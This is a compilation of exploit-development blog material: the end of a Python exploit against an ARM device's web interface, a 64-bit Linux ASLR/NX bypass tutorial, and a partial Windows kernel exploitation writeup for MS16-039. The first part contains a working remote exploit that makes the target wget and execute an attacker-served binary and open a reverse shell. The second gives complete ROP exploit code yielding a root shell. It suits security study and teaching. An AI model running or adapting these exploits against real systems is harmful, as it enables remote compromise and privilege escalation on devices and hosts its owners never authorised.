parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects

On April 12, 2016 Microsoft released 13 security bulletins.
Let’s to talk about how I triggered and exploited the CVE-2016-0165, one of the MS16-039 fixes.

Diffing Stage

For  MS16-039, Microsoft released a fix for all Window versions, either for 32 and 64 bits.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 y CVE-2016-0167.

Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».

ms16-039-diff

It’s interesting to say that this function started to be exported since Windows 10, when «win32k.sys» was split into 3 parts:  «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».

If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.

In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.

Summing up, two integer overflows were patched in the same function.

ms16-039-fdiff

Understanding the fix

If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:

"lea ecx,[rax+rax*2]"

In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).

At the same time, we can see that the structs number is represented by a 64 bit register, but the destination of this calculation is a 32 bit register!

Now, we know that it’s an integer overflow, the only thing we need to know is what number multiplied by 3 gives us a bigger result than 4GB.
The idea is that this result can’t be represented by a 32 bit number.

A simple way to know that is making the next calculation:

(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)

Now, if we multiplied this result by 3, we will obtain the next one:

 0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes

In the same basic block and two instructions below («shl ecx,4»), we can see that the number «2» obtained previously will be shifted 4 times to the left, which is the same to multiply this one by 16, resulting in the 0x20 value.

So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂

Path to the vulnerability

For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls directly to the vulnerable function.

NtGdiPathToRegion

From user space, this function is located in «gdi32.dll» and it’s exported as «PathToRegion«.

Triggering the vulnerability

Now we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability but, is it possible to
reach this number of POINTs?

In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo«.

Looking at the documentation, we see this definition:

BOOL PolylineTo(
 _In_ HDC hdc,
 _In_ const POINT *lppt,
 _In_ DWORD cCount
 );

The second argument is a POINT struct array and the third one is the array size.

It’s easy to think that, if we create 0x55555556 structs and then, we pass this structures as parameter we will trigger the vulnerability but WE WON’T, let’s see why.

If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».

PolylineTo

«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.

If we see this function, there is a check in the POINT struct number passed as argument:

NtGdiPolyPolyDraw

The maximum POINTs number that we can pass as parameter is 0x4E2000.

It’s clear that there is not a direct way to reach the wanted number to trigger this vulnerability, so what is the trick ?

Well, after some tests, the answer was pretty simple: «call many times to PolylineTo until reach the wanted number of POINT structs».

And the result was this:

ms16_039-bad-pool

The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.

PALLOCMEM2 function — «Bonus Track»

Triggering this vulnerability is relatively easy in 64 bit targets like Windows 8, 8.1 y 10.
Now, in «Windows 7» 64 bits, the vulnerability is very difficult to exploit.

Let’s see the vulnerable basic block and the memory allocator function:

ms16-039-w7-io1

The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register like Windows versions mentioned before.

The only feasible way to produce an integer overflow is with the previous instruction:

ms16-039-w7-io2

In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to get a kernel memory exhaustion than allocate this number of structures.

Now, why Windows 7 is different to the latest Windows versions ?

Well, if we look the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».

What is the difference ?

The «PALLOCMEM2» function receives a 32 bit argument size, but the  «__imp_ExAllocatePoolWithTag» function receives a 64 bit argument size.
The argument type defines how the result of the multiplication will be passed to the function allocator, in this case, the result is casted to «unsigned int».

We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now they call «PALLOCMEM2» have been exposed to integer overflows much easier to exploit.

Analyzing the heap overflow

Once we trigger the integer overflow, we have to understand what the consequences are.

As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».

heap_overlfow_callgraph

This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.

It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that it would destroy a big part of the Windows kernel heap, which quickly would give us a BSoD.

What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the the vulnerable function.

The trick here is that only POINT structs are copied when coordinates ARE NOT REPEATED.
E.g: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.

Thus, it’s possible to control exactly how many structures will be used by the heap overflow.

Some exploitation considerations

One of the most important things to know before to start to write the exploit is that, the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since this is used only temporarily.

ms16_039-alloc-free

It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.

Unfortunately, only some values to be overwritten are totally controlled by us, so, we are not able to overwrite the next chunk header with its original content.

On the other hand, we could think the alloc/free operation like «atomic», because we don’t have control execution until the «PathToRegion» function returns.

So, How is it possible to successfully exploit this vulnerability ?

Four years ago I explained something similar in the»The Big Trick Behind Exploit MS12-034» blogpost.

Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.

So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.

Finding the best memory allocator

Considering the previous one, now it’s necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.

ms16-039-chunk

When heap spray requires several interactions, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», making reference to the ancient Chinese technique (https://en.wikipedia.org/wiki/Feng_shui).

The POOL TYPE used by the vulnerable function is 0x21, which according to Microsoft means «NonPagedPoolSession» + «NonPagedPoolExecute».

Knowing this, it’s necessary to find some function that allow us to allocate memory in this pool type with the best possible accuracy.

The best function that I have found to heap spray the pool type 0x21 is via the «ZwUserConvertMemHandle» undocumented function, located in «gdi32.dll» and «user32.dll».

ZwUserConvertMemHandle

When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».

If we look at the «ConvertMemHandle» code, we can see the perfect allocator:

ConvertMemHandle

Basically, this function receives 2 parameters, BUFFER and SIZE and returns a HANDLE.

If we only see the yellow basic blocks, we can see that the «HMAllocObject» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.

To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard«.

Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.

Choosing GDI objects to be overwritten

Now, we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.

Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.

In that blogpost he described how GDI objects are composed:

typedef struct
 {
   BASEOBJECT64 BaseObject;
   SURFOBJ64 SurfObj;
   [...]
 } SURFACE64;

As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».

In my case, the problem is that I don’t control all values to be overwritten by the heap overflow, so, I can’t overwrite this property with an USEFUL ADDRESS.

A variant of abusing GDI object

Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.

After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.

This picture shows the content of the GDI object, before and after the heap overflow:
ms16_039-heap-overflow

The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set with the 0xFFFFFFFF value.
It means that now the GDI object is width=0xFFFFFFFF and height=0x01.

So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!

Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed by «SURFOBJ64.pvScan0» is contiguous to the object properties.

With all these things, it was time to write an exploit …

Exploitation — Step 1

In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.

So, the new calculation is:

0x55555557 x 3 = 0x1'0000'0005

As the result is a 32 bit number, we get 0x5, an then this number is multiplied by 16

0x5 << 4 = 0x50

It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.

The reason why I decided to increase the size by 0x30 bytes is because very small chunk allocations are not always predictable.

Adding the chunk header size (0x10 bytes), the heap spray to do should be like this:ms16_039-heap-spray-candidate

Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.

For alignment problems between the used small chunk and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.

Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.

ms16-039-heap-spray

Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.

Exploitation — Step 1.5

Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.

As the heap spray uses a big number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.

Looking at the function prototype:

HBITMAP CreateBitmap(
 _In_ int nWidth,
 _In_ int nHeight,
 _In_ UINT cPlanes,
 _In_ UINT cBitsPerPel,
 _In_ const VOID *lpvBits
 );
